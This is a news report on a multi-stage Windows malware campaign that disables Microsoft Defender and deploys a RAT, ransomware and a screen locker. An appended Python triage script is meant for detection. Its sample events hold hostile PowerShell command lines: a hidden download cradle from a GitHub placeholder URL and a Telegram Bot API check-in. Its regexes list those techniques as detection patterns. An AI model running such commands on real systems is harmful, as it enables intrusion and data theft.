New York/San Jose: Cybersecurity researchers have uncovered a highly sophisticated multi-stage malware campaign targeting Windows systems, capable of disabling Microsoft Defender before deploying ransomware, surveillance tools, and banking trojans. Notably, the attack does not exploit any software vulnerability and instead relies entirely on social engineering, legitimate system tools, and trusted cloud services.
According to security analysts, the campaign begins with business-themed decoy documents designed to appear as accounting or office files. Victims receive emails or shared files containing compressed archives. Once extracted, a concealed malicious shortcut (LNK file) is triggered, silently executing PowerShell commands in the background.
Malware downloaded from GitHub and Dropbox
Using PowerShell scripts, the malware downloads encrypted and obfuscated payloads from legitimate cloud platforms such as GitHub, allowing the attack traffic to blend into normal enterprise network activity. This technique significantly reduces the chances of detection by traditional signature-based security tools.
Fortinet threat researchers said the initial loader script establishes system persistence, opens decoy documents to distract the user, and then communicates with the attacker via the Telegram Bot API to confirm successful compromise.
Strategy to disable Microsoft Defender
One of the most dangerous aspects of this campaign is its ability to completely neutralise Microsoft Defender. To achieve this, attackers abused Defendnot, a research tool originally developed to demonstrate weaknesses in Windows Security Center.
By registering a fake antivirus product using this tool, the attackers exploit Windows trust assumptions, forcing Microsoft Defender to automatically shut down. Once Defender is disabled, the system is left fully exposed, allowing additional malicious components to be deployed without resistance.
Four-stage attack execution
Analysts noted that the malware operates in four distinct phases. In the first phase, security defences are disabled. The second phase involves environment reconnaissance and active surveillance, with screenshot-capturing modules exfiltrating visual data of user activity.
In the third phase, the attackers initiate a complete system lockdown, disabling administrative tools, destroying recovery mechanisms, and hijacking file associations. This prevents victims from launching legitimate applications or accessing their own files.
In the final phase, Amnesia RAT is deployed to maintain long-term remote access. The tool enables extensive data theft, targeting browser credentials, cryptocurrency wallets, and sensitive financial information.
Dual deployment of ransomware and WinLocker
Alongside remote access tools, the attackers also deploy Hakuna Matata ransomware, which encrypts user files and appends the NeverMind12F extension. Simultaneously, WinLocker components enforce a full system lockout, displaying countdown timers that pressure victims into contacting attackers to negotiate ransom payments.
Experts warn of rising attack sophistication
Cybersecurity experts say the campaign highlights a dangerous shift in threat actor tactics, where attackers no longer rely on exploitable vulnerabilities but instead abuse trusted system features, administrative tools, and cloud infrastructure.
This evolution poses serious challenges for traditional antivirus and detection mechanisms, particularly those dependent on known malware signatures. Experts have urged organisations and users to remain cautious when opening unexpected files, closely monitor PowerShell activity, restrict shortcut execution, and strengthen endpoint security controls.
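As an added illustration of the advice above (monitor PowerShell activity and restrict shortcut execution), here is example triage logic that is not from the original report or from Fortinet: it scores constructed process-creation events for the traits the article attributes to this campaign, a shortcut-launched (explorer.exe-parented) hidden PowerShell that pulls payloads from GitHub or Dropbox or checks in via the Telegram Bot API. The field names, weights, threshold and sample command lines are assumptions for this example.

```python
import re

# Constructed process-creation events (fields loosely modelled on Sysmon Event ID 1); not real telemetry.
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": POWERSHELL,   # shortcut-launched loader
     "cmdline": 'powershell.exe -w hidden -nop -ep bypass -c "iwr https://raw.githubusercontent.com/example/stage2.bin -OutFile $env:TEMP\\s2.bin"'},
    {"parent": r"C:\Windows\explorer.exe", "image": POWERSHELL,   # check-in to the operator (token is a placeholder)
     "cmdline": 'powershell.exe -c "Invoke-RestMethod https://api.telegram.org/bot<BOT_TOKEN>/sendMessage?chat_id=1&text=ok"'},
    {"parent": r"C:\Program Files\Microsoft VS Code\Code.exe", "image": POWERSHELL,   # benign developer use
     "cmdline": "powershell.exe -File build.ps1"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": POWERSHELL,   # benign admin use
     "cmdline": "powershell.exe Get-Process"},
]

# Command-line traits and assumed weights; tune against your own environment's baseline.
INDICATORS = [
    ("hidden_window",      re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    ("policy_bypass",      re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I), 1),
    ("encoded_command",    re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I), 2),
    ("download_cradle",    re.compile(r"\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|downloadfile)\b", re.I), 1),
    ("cloud_payload_host", re.compile(r"https?://(?:raw\.githubusercontent\.com|github\.com|(?:www\.|dl\.)?dropbox(?:usercontent)?\.com)/", re.I), 2),
    ("telegram_bot_api",   re.compile(r"api\.telegram\.org/bot", re.I), 3),
]
EXPLORER = re.compile(r"\\explorer\.exe$", re.I)
PS_IMAGE = re.compile(r"\\powershell\.exe$", re.I)

def score_event(ev):
    """Return (score, matched_trait_names) for one process-creation event."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(ev["cmdline"])]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    # A PowerShell child of explorer.exe is what a double-clicked .lnk typically produces.
    if EXPLORER.search(ev["parent"]) and PS_IMAGE.search(ev["image"]):
        hits.append("explorer_spawned_powershell")
        score += 1
    return score, hits

def suspicious(events, threshold=4):
    """Indexes, scores and traits of events at or above the alert threshold."""
    out = []
    for i, ev in enumerate(events):
        score, hits = score_event(ev)
        if score >= threshold:
            out.append((i, score, hits))
    return out

if __name__ == "__main__":
    for i, score, hits in suspicious(EVENTS):
        print(f"event {i}: score={score} traits={hits}")
```

On the constructed events only the two explorer-spawned PowerShell launches cross the threshold; the developer and admin invocations score zero.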
Researchers warn that similar campaigns are likely to increase, as attackers continue to weaponise legitimate technologies to bypass security defences and maintain long-term access to compromised systems.
